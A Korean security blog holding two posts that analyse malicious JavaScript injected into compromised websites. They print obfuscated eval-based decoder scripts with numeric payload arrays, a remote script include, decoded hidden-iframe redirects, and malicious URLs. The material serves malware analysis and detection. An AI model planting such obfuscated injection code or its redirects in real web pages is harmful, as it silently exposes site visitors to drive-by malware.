posted by Kwan's 2014. 1. 8. 04:00

우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. 

Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다.


1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)

-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location = "http://fukbb.com")

--> http://fukbb.com


2. 디코딩 순서 : 초기사이트 접속 -> Base 64 난독화 -> 일부 디코딩 -> Base 64 난독화 -> Blackhole 난독화 -> 디코딩


3. Web Developer Forum - 스샷



4. 난독화 해제

   가. 원본 소스


  나. 1차 디코딩 - 일부 base 64


  다. 2차 디코딩 - 남은 일부 base 64


  라. 3차 디코딩 - Blackhole(최종)


  마. http://oolbrmp.tld.cc/d/404.php?go=1 - window.location 통한 리다이렉팅


  바. 최종 도메인 - fukbb.com



5. 도메인 위치

  가. oolbrmp.tld.cc


  나. fukbb.com


6. 악성스크립트 - 바이러스 토탈 결과

* 바이러스 토탈 업로드 시 악성 스크립트 부분만 발췌해서 업로드 했습니다.



7. 번외편 - 이것의 결과는?

- 힌트 : HTML-CSS

* &lt; - 부등호(<)

* &gt; - 부등호(>)

* &quot; - 쌍따옴표(") 하나 

 &lt;

 script&gt;

 try

 {

   q=document.createElement(&quot;

   p&quot;

   );

   q.appendChild(q+&quot;

   &quot;

   );

 }

 catch(qw)

 {

   h=-012/5;

   try

   {

     bcsd=prototype-2;

   }

   catch(bawg)

   {

     ss=[];

     f=(h)?(&quot;

     fromCharC&quot;

     +&quot;

     ode&quot;

     ):&quot;

     &quot;;

     e=window[&quot;

     e&quot;

     +&quot;

     val&quot;

     ];

     n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,

198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,

204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,

117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,

312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,

52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,

309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,

484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,

464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436

,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,

303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,

228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,

345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,

174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336

,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,

432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333

,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,

404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,

192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312

,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,

101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,

309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,

300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,

125];

     if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++)

     {

       k=i;

       ss=ss+String[f](n[k]/(i%(h*h)+2-1));

     }

     e(ss);

   }

 }

 &lt;

 /script&gt;


글 중간에 바이러스 토탈 결과를 보듯이 난독화가 된 악성 스크립트의 차단 비율은 그다지 높지 않은 것 같다. 또한, 이처럼 단순 난독화가 아닌 현재 국내에서 다수 나타나고 있는 공다팩처럼 복잡하게 난독화된 기술은 더욱 탐지하기 힘들 것으로 보이며, 악성링크를 사전에 차단하여 피해를 줄이는 방안도 하나의 방법이라고 생각한다. 하지만, 어느 한편의 입장에서는 악성링크를 통해 다운로드되는 파일만 막으면 되지 않느냐는 말도 할 수 있다. 어떻게 보면 이 둘 다 맞는 말이라고 할 수도 있다. 그러나 한번에 한마리의 토끼를 잡는것 보다 한번에 두마리 토끼를 잡는 방법도 있듯이 두마리의 토끼를 한번에 잡는다면 주말에 안심하고 웹서핑을 할 수 있지 않을까 하는 생각이 된다.



  1. tra 2014.02.08 09:46  Addr  Edit/Del  Reply

    샘플파일 원츄 +_+

posted by Kwan's 2012. 6. 29. 19:40
감염 사이트 : http://211.239.162.41/~dongposarang/killer.html  

* 악성 링크이니 조심하시기 바랍니다!

 

 <!-- Captured infected page. Three injected regions are bracketed by marker comments (c3284d, d93065, start_qpi/end_qpi); the numeric payload arrays are truncated in this listing ([생략]). -->
 <html><head><script type="text/javascript">window.location="";
 </script></head><body><!--c3284d--><script>s="";
 // The decoder sits in the catch branches: the try body is written to throw (appendChild is handed a string, and n is not yet defined here), so the payload only runs where those statements actually raise.
 try
 {
   q=document.createElement("p");
   q.appendChild("123"+n);
 }
 catch(qw)
 {
   h=-016/7;
   // 016 is a legacy octal literal (14), so h is -2 and h*h is 4 in the loop below.
   try
   {
     // "prototype" is an undeclared identifier -> ReferenceError -> catch(zxc).
     a=prototype&5;
   }
   catch(zxc)
   {
     e=window["e"+"va"+"l"];
     // "e"+"va"+"l" assembles the name eval at runtime so a literal "eval" never appears in the source.
     n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략]

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

.split(".");
     // 161 iterations (i runs 0..160). Each code unit is n[k] divided by a divisor cycling 2,3,4,5 ((i%4)+2); the decoded text is then handed to eval.
     if(window.document)for(i=6-2-1-2-1;
     -161+i!=2-2;
     i++)
     {
       k=i;
       s=s+String.fromCharCode(n[k]/(i%(h*h)+2));
     }
     // Decoded result is shown under [복호화] below: a document.write of a 2x2 hidden iframe.
     e(s);
   }
  
 }
 </script><!--/c3284d-->
 <!--d93065-->                                                                                                                                                                                                        <script>try
 {
   // Same construction as the c3284d block: q+"" is a string, so appendChild throws and control moves to catch(qw).
   q=document.createElement("p");
   q.appendChild(q+"");
 }
 catch(qw)
 {
   h=-012/5;
   // 012 is octal 10, so h is -2 again; (h) is truthy, which selects the "fromCharCode" name below.
   try
   {
     bcsd=prototype-2;
   }
   catch(bawg)
   {
     ss=[];
     f=(h)?("fromCharC"+"ode"):"";
     e=window["e"+"val"];
     // Both String[f] ("fromCharCode") and window["e"+"val"] are assembled at runtime; these split names and the marker comments are practical signatures for this injection pattern.
     n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

 102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];
     // 160 iterations; the divisor here cycles 1,2,3,4 ((i%4)+2-1). ss starts as [] but []+string yields a string.
     if(window.document)for(i=6-2-1-2-1;
     -160+i!=2-2;
     i++)
     {
       k=i;
       ss=ss+String[f](n[k]/(i%(h*h)+2-1));
     }
     // The "if(1)" prefix is noise; the decoded statement (after the second ==== divider below) is another hidden-iframe document.write.
     e("if(1)"+ss);
   }
  
 }
 </script><!--/d93065-->
 
 
 
 
 <a href="">Click</a>
 <!-- Third injection: a remote script loaded from an external host, bracketed by start_qpi/end_qpi. -->
 <!--start_qpi--><script src=http://mmm2011.ppcsoft.in/pizda.js></script><!--end_qpi-->
 </body></html>

 

[복호화]

 

26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략].

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

 

----------------------------------------------------------------------------------------

 

document.write('<iframe src="http://hecrery.ru/count11.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

========================================================================================

 

13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40

 

=======================================================================================

if(1)

document.write('<iframe src="http://iwahroq.ru/count6.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

count6.php, count11.php 페이지는 모두 죽어있는 상태이다 !

 

=========================
Server IP(s):
0.0.0.0

========================= 

 
